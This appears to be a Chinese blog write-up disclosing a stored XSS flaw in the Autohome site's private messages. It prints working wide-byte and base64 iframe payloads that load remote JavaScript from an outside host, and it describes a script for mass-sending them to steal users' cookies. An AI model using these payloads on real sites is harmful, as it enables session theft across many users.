晚上没事干,由于喜欢车,所以来到汽车之家转了转,登陆用户后,里面有个私信的机制:

imgpxy.php?url=gnp.567232047151704102%2F7041_htnom%2Fserutcip%2Fmoc.gidkcah.1cip%2F%2F%3Aptth

大家可以看到,这里理论上是不允许插入dom节点的,我们进行了小测试,当我问输入标签时候,

1. 这里会做一个转换,然后在输出的时候做了html编码处理

2.由于我们看到页面的编码为

,所以我们就大胆的试了试对<>进行宽字节处理

,转换为%df%3cimg%df%3e,神奇的事情出现了,我们在查看dom树的时候发现居然生成了一个节点

3.可是好景不长,当我们构造完整的语句时候,例如%df%3cimg%20src=1%20οnerrοr=alert(1)%df%3e时候,极其失望的时候这里面凡是以on开头的标签属性全部统统给转义为XSS_error,这个跟通用骑士cms有些像

4.那我们是否可以不用标签动作呢,我接下来尝试了script,iframe等等标签,失败的是也被转移了

5,接着我就再试了试,src 上面的javascript还是被转移了

6,如果我们src上面不用javascript那么经过测试完全可以输入进去,在我们不断的尝试过程中,我们可以采用base64的结构进行构造

%df%3ciframe/**/src='data:text/html;base64,PHNjcmlwdCBzcmM9aHR0cDovL2prZ2gwMDYuYnlldGhvc3QxNy5jb20vdF94LmpzID48L3NjcmlwdD4='%df%3e%df%3c/iframe%df%3e,失望的是前面都测试过了,iframe清楚了,如图所示:

imgpxy.php?url=gnp.315642047151704102%2F7041_htnom%2Fserutcip%2Fmoc.gidkcah.1cip%2F%2F%3Aptth

可以看到PrivateLetterContent里面就是我们将要插入页面的内容,这里被剔除了

7,让我神奇的在里面加入一个特殊字符的时候,iframe标签,构造如下:

%df%3ciframe/**/src='data:text/html;base64,PHNjcmlwdCBzcmM9aHR0cDovL2prZ2gwMDYuYnlldGhvc3QxNy5jb20vdF94LmpzID48L3NjcmlwdD4='/*&*/%df%3e%df%3c/iframe%df%3e

神奇的出现了,如图所示:

imgpxy.php?url=gnp.092752047151704102%2F7041_htnom%2Fserutcip%2Fmoc.gidkcah.1cip%2F%2F%3Aptth

8.我们去页面看看我们提前加载的远程js是否被执行了:

imgpxy.php?url=gnp.436352047151704102%2F7041_htnom%2Fserutcip%2Fmoc.gidkcah.1cip%2F%2F%3Aptth

效果跟我们的预期一样,然后我们到收私信的人那边也看看,这个东西是否能执行,果不其然

9,在汽车之家里面,自己的主页可以进行设置,只允许好友之间发私信,

imgpxy.php?url=gnp.107562047151704102%2F7041_htnom%2Fserutcip%2Fmoc.gidkcah.1cip%2F%2F%3Aptth

url里面八位数的东西,我们可以后台写一个脚本,遍历群发给所有的车友,危害非常大,指哪打哪

10,总结,这里我写好了攻击脚本,但是由于之前测试插入的节点破坏了私信的删除功能,很郁闷,没有敢大规模群发漏洞证明:

修复方案:

你们很专业,很懂

html5%3cimg%3e属性,汽车之家存储型xss可大规模获取任何用户cookie相关推荐

  1. iCMS前台存储型XSS漏洞

    该漏洞CNVD-ID: CNVD-2019-10126 漏洞提交CNVD后,待CNVD公示才发出本文. 测试环境: 程序版本:v7.0.14 Windows + firefox + burpsuite ...

  2. UEditor编辑器存储型XSS漏洞

    挖洞经验|UEditor编辑器存储型XSS漏洞 - FreeBuf网络安全行业门户 前言 UEditor是由百度web前端研发部开发的所见即所得富文本web编辑器,具有轻量,可定制,注重用户体验等特点 ...

  3. 富文本存储型XSS的模糊测试之道

    富文本存储型XSS的模糊测试之道 凭借黑吧安全网漏洞报告平台的公开案例数据,我们足以管中窥豹,跨站脚本漏洞(Cross-site Script)仍是不少企业在业务安全风险排查和修复过程中需要对抗的&q ...

  4. Java SSM框架+jsp处理存储型XSS和反射型XSS漏洞

    关于存储型XSS和反射型XSS漏洞的修复 *这里是java中SSM框架,前端页面为JSP,仅在服务端做处理,思路是对脚本转义* 存储型XSS漏洞 1:表现形式 2:解决方式 第一步:创建过滤器XssR ...

  5. XSS—存储型xss

    xss =>跨站脚本攻击=>前端代码注入=>用户输入的数据会被当做前端代码执行. 原理:使用者提交的XSS代码被存储到服务器上的数据库里或页面或某个上传文件里,导致用户访问页面展示的 ...

  6. 为解决存储型xss和sql注入漏洞,创建对应的全局过滤器

    1.存储型xss漏洞 系统由于未对参数过滤,导致可以存储html特殊标签,且返回的数据未经处理显示在web页面中导致存在存储型xss,攻击者可利用xss对用户发起鱼叉攻击获取cookie进入系统.为解 ...

  7. 大神论坛 UEditor 富文本web编辑器最新漏洞版XML文件上传导致存储型XSS

    一.Ueditor最新版XML文件上传导致存储型XSS 测试版本:php版 v1.4.3.3 下载地址:https://github.com/fex-team/ueditor 复现步骤: 1. 上传一 ...

  8. DVWA通关--存储型XSS(XSS (Stored))

    目录 LOW 通关步骤 源码分析 MEDIUM 通关步骤 源码分析 HIGH 通关步骤 源码分析 IMPOSSIBLE 源码分析 存储型XSS也叫持久型XSS,从名字就知道特征是攻击代码会被存储在数据 ...

  9. XSS平台的用法、存储型XSS、Dom based XSS

    XSS平台的用法.存储型XSS.Dom based XSS 如何使用XSS平台 这里介绍一种常用的xss平台.https://xsspt.com/ 如果xss的payload比较复杂的话,我们可以使用 ...

最新文章

  1. Scrapy爬虫及案例剖析
  2. Rocket - diplomacy - AddressAdjuster
  3. 新时代网管的十二大主要职责(一)
  4. iOS开发笔记 -- 推送证书的创建及合并
  5. Socket心跳包机制
  6. delphi 搭建安卓开发环境
  7. 使用 pg_dump 迁移 postgresql
  8. 计算机科学概论(2)数据的操控和程序的执行
  9. mysql memcached java_java缓存技术memcached实例
  10. 让我的网站变成响应式的3个简单步骤
  11. fpga开发教程 labview_NILabVIEW高性能FPGA开发者指南.pdf
  12. 重建大师5.0成为首款支持国产麒麟操作系统的自动实景三维建模软件
  13. python提取cad坐标_从CAD图里提取坐标的方法
  14. python实现触摸精灵功能_FRIDA脚本系列(三)超神篇:百度AI“调教”抖音AI
  15. 计算机信息中心的安全生产责任,信息中心安全生产责任制 (刘.doc
  16. 【初学者必知必会】【电子技术:数电 模电 单片机】【基础概念和小知识点】详解
  17. 研究生学习生活日记——未来三年的规划
  18. 参加第2届全国高校大数据教学研讨会总结
  19. dfuse 现在正式面向商业部署
  20. python拨打网络电话_0成本搭建IP电话系统,统一通信系统,呼叫中心系统-3CX快速安装手册...

热门文章

  1. python opencv保存图片到指定路径_OpenCV-将图像保存到所选的特定文件夹
  2. java 等待时间_java工作复习——4大时间等待——显示等待
  3. html5+桌面推送,HTML5 Web Notifications 桌面推送小记
  4. C语言中怎么自动生成时间,在C语言中转换时间的基本方法介绍
  5. 【转】如何在win10(64位系统)上安装apache服务器
  6. [转]php连接postgresql
  7. struts2 上传文件 HTTP Status 404 - No result defined for action.....and result input
  8. QTP连接sqlserver
  9. 计算机国家实验教学示范中心,教育部 财政部关于批准2007年国家级实验教学示范中心建设...
  10. java炫酷龙卷风源码_Java-使用二叉树实现快速排序-遁地龙卷风